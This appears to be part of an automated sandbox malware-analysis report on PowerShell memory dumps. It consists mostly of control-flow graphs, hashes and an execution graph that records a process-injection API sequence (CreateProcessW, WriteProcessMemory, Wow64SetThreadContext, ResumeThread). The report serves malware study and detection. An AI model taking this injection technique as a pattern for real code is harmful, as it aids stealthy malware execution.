                                                                                                                                              • Opcode Fuzzy Hash: e9bf2a7a0ff1d59173676c30a39d75dcb183eb9f2beb233881a0df3a09769d3e
                                                                                                                                              • Instruction Fuzzy Hash: 9441F67091CB889FD716DB589C847BABBF0FB56321F04426FD089D3562CB646806C781

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442037308.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe899d0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2b8487a4b10cffdaf2a089b5aacef7b9e60b306cb747e49c0ec980c43b9fe69f
                                                                                                                                              • Instruction ID: 11a99e0e03ac67961ca48f32f80dfc7be619e3b8cad3acbad80ba75ec48e0378
                                                                                                                                              • Opcode Fuzzy Hash: 2b8487a4b10cffdaf2a089b5aacef7b9e60b306cb747e49c0ec980c43b9fe69f
                                                                                                                                              • Instruction Fuzzy Hash: 5821A16191E3D15FE317A778AC612E87FA0AF03224F0901D7D0D8CB0F3D619655AC766

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 41 7fe89aa8519-7fe89aa85c9 43 7fe89aa8aad-7fe89aa8b66 41->43 44 7fe89aa85cf-7fe89aa85d9 41->44 45 7fe89aa85db-7fe89aa85e8 44->45 46 7fe89aa85f2-7fe89aa85f9 44->46 45->46 48 7fe89aa85ea-7fe89aa85f0 45->48 49 7fe89aa85fb-7fe89aa860e 46->49 50 7fe89aa8610 46->50 48->46 51 7fe89aa8612-7fe89aa8614 49->51 50->51 54 7fe89aa8a28-7fe89aa8a32 51->54 55 7fe89aa861a-7fe89aa8626 51->55 56 7fe89aa8a45-7fe89aa8a55 54->56 57 7fe89aa8a34-7fe89aa8a44 54->57 55->43 58 7fe89aa862c-7fe89aa8636 55->58 60 7fe89aa8a57-7fe89aa8a5b 56->60 61 7fe89aa8a62-7fe89aa8aac 56->61 62 7fe89aa8638-7fe89aa8645 58->62 63 7fe89aa8652-7fe89aa8662 58->63 60->61 62->63 64 7fe89aa8647-7fe89aa8650 62->64 63->54 69 7fe89aa8668-7fe89aa869c 63->69 64->63 69->54 74 7fe89aa86a2-7fe89aa86ae 69->74 74->43 75 7fe89aa86b4-7fe89aa86be 74->75 76 7fe89aa86d7-7fe89aa86dc 75->76 77 7fe89aa86c0-7fe89aa86cd 75->77 76->54 78 7fe89aa86e2-7fe89aa86e7 76->78 77->76 79 7fe89aa86cf-7fe89aa86d5 77->79 78->54 80 7fe89aa86ed-7fe89aa86f2 78->80 79->76 80->54 81 7fe89aa86f8-7fe89aa8707 80->81 83 7fe89aa8709-7fe89aa8713 81->83 84 7fe89aa8717 81->84 85 7fe89aa8715 83->85 86 7fe89aa8733-7fe89aa87be 83->86 87 7fe89aa871c-7fe89aa8729 84->87 85->87 94 7fe89aa87c0-7fe89aa87cb 86->94 95 7fe89aa87d2-7fe89aa87f4 86->95 87->86 88 7fe89aa872b-7fe89aa8731 87->88 88->86 94->95 96 7fe89aa87f6-7fe89aa8800 95->96 97 7fe89aa8804 95->97 98 7fe89aa8820-7fe89aa88ae 96->98 99 7fe89aa8802 96->99 100 7fe89aa8809-7fe89aa8816 97->100 107 7fe89aa88b0-7fe89aa88bb 98->107 108 7fe89aa88c2-7fe89aa88e0 98->108 99->100 100->98 102 7fe89aa8818-7fe89aa881e 100->102 102->98 107->108 109 7fe89aa88f0 108->109 110 7fe89aa88e2-7fe89aa88ec 108->110 113 7fe89aa88f5-7fe89aa8903 109->113 111 7fe89aa890d-7fe89aa899d 110->111 112 7fe89aa88ee 110->112 120 7fe89aa89b1-7fe89aa8a0a 111->120 121 7fe89aa899f-7fe89aa89aa 111->121 112->113 113->111 114 7fe89aa8905-7fe89aa890b 113->114 114->111 124 7fe89aa8a12-7fe89aa8a27 120->124 121->120
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442183103.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe89aa0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d54c1107d2dbb626546f6cbc58eab8379a4dab5d72de0beffb0172467d1c67f7
                                                                                                                                              • Instruction ID: 31070c1a3dde99f4cd1e6011fa4c05d54699e555c54fa50a2f0a1f3300948608
                                                                                                                                              • Opcode Fuzzy Hash: d54c1107d2dbb626546f6cbc58eab8379a4dab5d72de0beffb0172467d1c67f7
                                                                                                                                              • Instruction Fuzzy Hash: 3A22E23090CB894FE79ADB2C94506697FE2FF8A354F2401EAD48EC72A3DA35AC55C741

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 125 7fe89aa55cd-7fe89aa55ce 126 7fe89aa561c-7fe89aa561d 125->126 127 7fe89aa55d0-7fe89aa5618 125->127 128 7fe89aa5679 126->128 129 7fe89aa561f-7fe89aa5638 126->129 127->126 131 7fe89aa567b 128->131 132 7fe89aa567e-7fe89aa568f 128->132 131->132 133 7fe89aa5696-7fe89aa56a7 132->133 134 7fe89aa5691 132->134 136 7fe89aa56a9 133->136 137 7fe89aa56ae-7fe89aa5708 133->137 134->133 135 7fe89aa5693 134->135 135->133 136->137 138 7fe89aa56ab 136->138 139 7fe89aa570a-7fe89aa570c 137->139 140 7fe89aa5760-7fe89aa576a 137->140 138->137 141 7fe89aa5770-7fe89aa577a 140->141 142 7fe89aa58d3-7fe89aa599c 140->142 143 7fe89aa577c-7fe89aa5789 141->143 144 7fe89aa5793-7fe89aa5798 141->144 143->144 146 7fe89aa578b-7fe89aa5791 143->146 147 7fe89aa579e-7fe89aa57a1 144->147 148 7fe89aa5873-7fe89aa587d 144->148 146->144 151 7fe89aa57e6 147->151 152 7fe89aa57a3-7fe89aa57b2 147->152 149 7fe89aa587f-7fe89aa588d 148->149 150 7fe89aa588e-7fe89aa589e 148->150 154 7fe89aa58ab-7fe89aa58d0 150->154 155 7fe89aa58a0-7fe89aa58a4 150->155 156 7fe89aa57e8-7fe89aa57ea 151->156 152->142 160 7fe89aa57b8-7fe89aa57c2 152->160 154->142 155->154 156->148 159 7fe89aa57f0-7fe89aa57f6 156->159 162 7fe89aa57f8-7fe89aa5805 159->162 163 7fe89aa5812-7fe89aa5843 159->163 165 7fe89aa57db-7fe89aa57e4 160->165 166 7fe89aa57c4-7fe89aa57d1 160->166 162->163 167 7fe89aa5807-7fe89aa5810 162->167 172 7fe89aa584a-7fe89aa5854 163->172 165->156 166->165 169 7fe89aa57d3-7fe89aa57d9 166->169 167->163 169->165 175 7fe89aa585a-7fe89aa5872 172->175
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442183103.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe89aa0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 701c4e0ce75c4b813e85787c30b5e5fe101d283dda8574981bf46af800e45ad1
                                                                                                                                              • Instruction ID: 8dbece45b425ddacf0b898b6cf9f150ac040dd4283f240ffabc83da6e6318a89
                                                                                                                                              • Opcode Fuzzy Hash: 701c4e0ce75c4b813e85787c30b5e5fe101d283dda8574981bf46af800e45ad1
                                                                                                                                              • Instruction Fuzzy Hash: CFC1363090D7C90FE746A7286C146BA7FE1EF87260F1911EBD48DCB0A3D619AC16C362

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 177 7fe89aa4135-7fe89aa41c4 178 7fe89aa4427-7fe89aa44e6 177->178 179 7fe89aa41ca-7fe89aa41d4 177->179 180 7fe89aa41d6-7fe89aa41e3 179->180 181 7fe89aa41ed-7fe89aa41f2 179->181 180->181 182 7fe89aa41e5-7fe89aa41eb 180->182 184 7fe89aa41f8-7fe89aa41fb 181->184 185 7fe89aa43cb-7fe89aa43d5 181->185 182->181 186 7fe89aa41fd-7fe89aa4210 184->186 187 7fe89aa4212 184->187 188 7fe89aa43d7-7fe89aa43e3 185->188 189 7fe89aa43e4-7fe89aa43f4 185->189 194 7fe89aa4214-7fe89aa4216 186->194 187->194 190 7fe89aa43f6-7fe89aa43fa 189->190 191 7fe89aa4401-7fe89aa4424 189->191 190->191 191->178 194->185 195 7fe89aa421c-7fe89aa4250 194->195 202 7fe89aa4267 195->202 203 7fe89aa4252-7fe89aa4265 195->203 204 7fe89aa4269-7fe89aa426b 202->204 203->204 204->185 206 7fe89aa4271-7fe89aa4279 204->206 206->178 207 7fe89aa427f-7fe89aa4289 206->207 208 7fe89aa428b-7fe89aa4298 207->208 209 7fe89aa42a5-7fe89aa42b5 207->209 208->209 210 7fe89aa429a-7fe89aa42a3 208->210 209->185 212 7fe89aa42bb-7fe89aa42ec 209->212 210->209 212->185 216 7fe89aa42f2-7fe89aa431e 212->216 218 7fe89aa4320-7fe89aa4342 216->218 219 7fe89aa4344 216->219 220 7fe89aa4346-7fe89aa4348 218->220 219->220 220->185 221 7fe89aa434e-7fe89aa4356 220->221 223 7fe89aa4358-7fe89aa4362 221->223 224 7fe89aa4366 221->224 225 7fe89aa4364 223->225 226 7fe89aa4382-7fe89aa43b1 223->226 228 7fe89aa436b-7fe89aa4378 224->228 225->228 232 7fe89aa43b8-7fe89aa43ca 226->232 228->226 229 7fe89aa437a-7fe89aa4380 228->229 229->226
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442183103.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe89aa0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 205d3969572007d24f44d3339cd2cbfb7cad7e310b1c9ab7a4b78a54e084d7bd
                                                                                                                                              • Instruction ID: d6b7095a4492dfd32880e7fc570b07b7d5e9d042f79d855df2d49ada9728121c
                                                                                                                                              • Opcode Fuzzy Hash: 205d3969572007d24f44d3339cd2cbfb7cad7e310b1c9ab7a4b78a54e084d7bd
                                                                                                                                              • Instruction Fuzzy Hash: 95C1473090DBC90FE74AA76C58506BA7FE1EF46784F1901EBE48ECB1A3D618AC15C361

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 233 7fe89aa0f42-7fe89aa0f96 234 7fe89aa1098-7fe89aa10dc 233->234 235 7fe89aa0f9c-7fe89aa0fa6 233->235 243 7fe89aa10ed-7fe89aa1124 234->243 244 7fe89aa10de-7fe89aa10e7 234->244 236 7fe89aa0fa8-7fe89aa0fb5 235->236 237 7fe89aa0fbf-7fe89aa0fee 235->237 236->237 238 7fe89aa0fb7-7fe89aa0fbd 236->238 237->234 250 7fe89aa0ff4-7fe89aa0ffe 237->250 238->237 245 7fe89aa112a-7fe89aa119e 243->245 246 7fe89aa11c1-7fe89aa11cb 243->246 244->243 266 7fe89aa11a6-7fe89aa11be 245->266 248 7fe89aa11d8-7fe89aa11e8 246->248 249 7fe89aa11cd-7fe89aa11d7 246->249 251 7fe89aa11ea-7fe89aa11ee 248->251 252 7fe89aa11f5-7fe89aa121a 248->252 254 7fe89aa1017-7fe89aa1077 250->254 255 7fe89aa1000-7fe89aa100d 250->255 251->252 263 7fe89aa1079-7fe89aa1084 254->263 264 7fe89aa108b-7fe89aa1097 254->264 255->254 256 7fe89aa100f-7fe89aa1015 255->256 256->254 263->264 266->246
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442183103.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe89aa0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2016646a4807bacb29ace62da4081f0b12d677e37d1e9201b2e5f02692795543
                                                                                                                                              • Instruction ID: af60571ee7dbcd5e2bed840fee26b783513aa90c47580847c84ea3f84c5b176a
                                                                                                                                              • Opcode Fuzzy Hash: 2016646a4807bacb29ace62da4081f0b12d677e37d1e9201b2e5f02692795543
                                                                                                                                              • Instruction Fuzzy Hash: 4BA1C220A4DBC90FE357973C58642657FE1EF5B254B2901EBC48ECB1B3DA189C5AC362

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 267 7fe89aa5711-7fe89aa576a 269 7fe89aa5770-7fe89aa577a 267->269 270 7fe89aa58d3-7fe89aa599c 267->270 271 7fe89aa577c-7fe89aa5789 269->271 272 7fe89aa5793-7fe89aa5798 269->272 271->272 274 7fe89aa578b-7fe89aa5791 271->274 275 7fe89aa579e-7fe89aa57a1 272->275 276 7fe89aa5873-7fe89aa587d 272->276 274->272 279 7fe89aa57e6 275->279 280 7fe89aa57a3-7fe89aa57b2 275->280 277 7fe89aa587f-7fe89aa588d 276->277 278 7fe89aa588e-7fe89aa589e 276->278 282 7fe89aa58ab-7fe89aa58d0 278->282 283 7fe89aa58a0-7fe89aa58a4 278->283 284 7fe89aa57e8-7fe89aa57ea 279->284 280->270 288 7fe89aa57b8-7fe89aa57c2 280->288 282->270 283->282 284->276 287 7fe89aa57f0-7fe89aa57f6 284->287 290 7fe89aa57f8-7fe89aa5805 287->290 291 7fe89aa5812-7fe89aa5854 287->291 293 7fe89aa57db-7fe89aa57e4 288->293 294 7fe89aa57c4-7fe89aa57d1 288->294 290->291 295 7fe89aa5807-7fe89aa5810 290->295 303 7fe89aa585a-7fe89aa5872 291->303 293->284 294->293 297 7fe89aa57d3-7fe89aa57d9 294->297 295->291 297->293
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442183103.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe89aa0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e9a18e4a2ce633a06288df451112894fd6017eae0ad4cc054ac81e6214d2aa2d
                                                                                                                                              • Instruction ID: 43116f603f1ed1cfdf4f1e7b0f714f81d345d814dea40ff930e275f4b1a3032b
                                                                                                                                              • Opcode Fuzzy Hash: e9a18e4a2ce633a06288df451112894fd6017eae0ad4cc054ac81e6214d2aa2d
                                                                                                                                              • Instruction Fuzzy Hash: E0415731D1CB8A0FE356E72C58503B97FE2EF86250F1910EBC48DCB1A3DA25AC158351
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442183103.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe89aa0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 60692e4e606dbd5e9d5d12512b3a15cfdc425c7b2a740ba4bc7e271ad0de99fc
                                                                                                                                              • Instruction ID: 851c5c44771fd739e318112888a177feb0609453e217c1023e2fb8c1967a7afb
                                                                                                                                              • Opcode Fuzzy Hash: 60692e4e606dbd5e9d5d12512b3a15cfdc425c7b2a740ba4bc7e271ad0de99fc
                                                                                                                                              • Instruction Fuzzy Hash: EDB1262090E7C90FE747A77898242A67FF1EF4B254F1901EBD48DCB1A3D6199D1AC362

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:13
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 3183 7fe899a9eeb 3184 7fe899a9ef0 ResumeThread 3183->3184 3186 7fe899a9f6b 3184->3186 3187 7fe899a89f0 3190 7fe899a5ff8 3187->3190 3191 7fe899a9ae0 Wow64SetThreadContext 3190->3191 3193 7fe899a8542 3191->3193 3194 7fe899a9744 3195 7fe899a976f CreateProcessW 3194->3195 3197 7fe899a9993 3195->3197 3198 7fe899a9db2 3199 7fe899a9dd0 WriteProcessMemory 3198->3199 3201 7fe899a9e91 3199->3201

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: b18bad8e00e90b0908c2d384817f0856587a413353eaa3df4156682e1314cc5b
                                                                                                                                              • Instruction ID: 0b4c0e40a6ed64add8deef72f2757d0e720ac043f570109ce2fddc66fc28551b
                                                                                                                                              • Opcode Fuzzy Hash: b18bad8e00e90b0908c2d384817f0856587a413353eaa3df4156682e1314cc5b
                                                                                                                                              • Instruction Fuzzy Hash: BEA19C3181CB9C8FDB65DB589845BE9BBF0FB59310F14429AD04DE7262CB30A985CB82

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: 30bd428c06532573e703de3842e1c61eea85206fe01154147edf35781bc3505d
                                                                                                                                              • Instruction ID: 7fa2ae747a7ad654b873da9a55a3b50a7e305aeb4b00d745deba99359ef4bae0
                                                                                                                                              • Opcode Fuzzy Hash: 30bd428c06532573e703de3842e1c61eea85206fe01154147edf35781bc3505d
                                                                                                                                              • Instruction Fuzzy Hash: B9915B31D18A5C8FDB65DF58D845BEDBBF1FB58710F10429AD04EE7261CB30A9858B81

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 40 7fe899a9db2-7fe899a9e40 43 7fe899a9e4a-7fe899a9e8f WriteProcessMemory 40->43 44 7fe899a9e42-7fe899a9e47 40->44 45 7fe899a9e97-7fe899a9ec1 43->45 46 7fe899a9e91 43->46 44->43 46->45
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: cf896167768dc1618e1f674201db0f1798c97b62c659a8628900ca25d925bd8a
                                                                                                                                              • Instruction ID: 8c2c27b76193fc7f3092c81fd0a6efd8f31ef7b33047d11fa144e6d148487c91
                                                                                                                                              • Opcode Fuzzy Hash: cf896167768dc1618e1f674201db0f1798c97b62c659a8628900ca25d925bd8a
                                                                                                                                              • Instruction Fuzzy Hash: 8F31F63191CB588FDB18DF5C98456FD7BE0FB99321F04826FE089D3252CB74A8458B91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 47 7fe899a6038-7fe899a9e40 50 7fe899a9e4a-7fe899a9e8f WriteProcessMemory 47->50 51 7fe899a9e42-7fe899a9e47 47->51 52 7fe899a9e97-7fe899a9ec1 50->52 53 7fe899a9e91 50->53 51->50 53->52
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: 0a4d8ecd40c8f60d29badcc6397a5cb764ee4a7b81819383b6f106651549b0dc
                                                                                                                                              • Instruction ID: aaec855cd971051a60bde3480abfdc5ed26fa2abc491c36eadb9b88117cea73f
                                                                                                                                              • Opcode Fuzzy Hash: 0a4d8ecd40c8f60d29badcc6397a5cb764ee4a7b81819383b6f106651549b0dc
                                                                                                                                              • Instruction Fuzzy Hash: 3131A13091CB588FDB18DF5C98457EDBBE0FBA9711F10826EE089D3252CB70A8458B91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 54 7fe899a5ff8-7fe899a9b35 57 7fe899a9b37-7fe899a9b3c 54->57 58 7fe899a9b3f-7fe899a9b71 Wow64SetThreadContext 54->58 57->58 59 7fe899a9b79-7fe899a9ba0 58->59 60 7fe899a9b73 58->60 60->59
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: 9065b163252ea0d1b83c6090fdfe685b4db11851c3f14c5af8f9a69ffc7867ef
                                                                                                                                              • Instruction ID: bbe6a4dd0b523ebac4be7a3f4c2fb286115b0d6af3e0f5bac0d5445dcc9f1f68
                                                                                                                                              • Opcode Fuzzy Hash: 9065b163252ea0d1b83c6090fdfe685b4db11851c3f14c5af8f9a69ffc7867ef
                                                                                                                                              • Instruction Fuzzy Hash: 0231063090CB5C8FDB54DF5CD8897EA7BE1FB59721F04825BD449C7126DB30A80A8B91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 61 7fe899a6018-7fe899a9b35 64 7fe899a9b37-7fe899a9b3c 61->64 65 7fe899a9b3f-7fe899a9b71 Wow64SetThreadContext 61->65 64->65 66 7fe899a9b79-7fe899a9ba0 65->66 67 7fe899a9b73 65->67 67->66
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: 709fda3637f930b6cabd5be75e73ad92c664f1c88b4c93a2616520ff6b89524c
                                                                                                                                              • Instruction ID: 1796fffc92a761e7690aa5a2c7778f838bf09d170bba32be74017b1c5916a1d7
                                                                                                                                              • Opcode Fuzzy Hash: 709fda3637f930b6cabd5be75e73ad92c664f1c88b4c93a2616520ff6b89524c
                                                                                                                                              • Instruction Fuzzy Hash: AA31063090CB5C8FDB54DF5CD8897EA7BE1FB59721F04825BD449C7126DB30A80A8B91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 68 7fe899a9adb-7fe899a9b35 71 7fe899a9b37-7fe899a9b3c 68->71 72 7fe899a9b3f-7fe899a9b71 Wow64SetThreadContext 68->72 71->72 73 7fe899a9b79-7fe899a9ba0 72->73 74 7fe899a9b73 72->74 74->73
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: 3e42320da2c6b12c9869c565ec11db11b54d0ef7e2ecf4922cb02e6220699a14
                                                                                                                                              • Instruction ID: a1ada094415b912b053fc6817d06e2a2aecb35253c34cc6dbcdf023ee7303110
                                                                                                                                              • Opcode Fuzzy Hash: 3e42320da2c6b12c9869c565ec11db11b54d0ef7e2ecf4922cb02e6220699a14
                                                                                                                                              • Instruction Fuzzy Hash: 9521F331908B1C8FDB68DF5CD8897FA7BE0FB99321F04825BD449C7126DB30A9098B91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 75 7fe899a6068-7fe899a9f69 ResumeThread 78 7fe899a9f6b 75->78 79 7fe899a9f71-7fe899a9f8d 75->79 78->79
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: a492b2049320da613bbeff5448df69ad3a4b1bb0be7e4aff7b6eeb013855ed4a
                                                                                                                                              • Instruction ID: 48fce0c659e2b60795a9d586b22b37a5b6a5c28a03324cfba73d6683c7d8b5a9
                                                                                                                                              • Opcode Fuzzy Hash: a492b2049320da613bbeff5448df69ad3a4b1bb0be7e4aff7b6eeb013855ed4a
                                                                                                                                              • Instruction Fuzzy Hash: 5021D33090CA4C9FDB58DB58D849BB9BBE0FB65321F10421ED04ED3661D7716816CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 80 7fe899a9eeb-7fe899a9f69 ResumeThread 83 7fe899a9f6b 80->83 84 7fe899a9f71-7fe899a9f8d 80->84 83->84
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.474834471.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe899a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: b7ce3cb295de6b9e7f29fb8d0f976bfc663527025da10a362b4d7fd1fb2ec000
                                                                                                                                              • Instruction ID: aba60476040127fdcdb018b2b127d810d7ecc0113bdfe491cb6948e613af07fa
                                                                                                                                              • Opcode Fuzzy Hash: b7ce3cb295de6b9e7f29fb8d0f976bfc663527025da10a362b4d7fd1fb2ec000
                                                                                                                                              • Instruction Fuzzy Hash: C6218E71A0CA0C9FDB58DB58D849BF9BBE0FBA5321F00421ED04AD3661D771A856CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.476444652.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe89a70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: XhT
                                                                                                                                              • API String ID: 0-3355534747
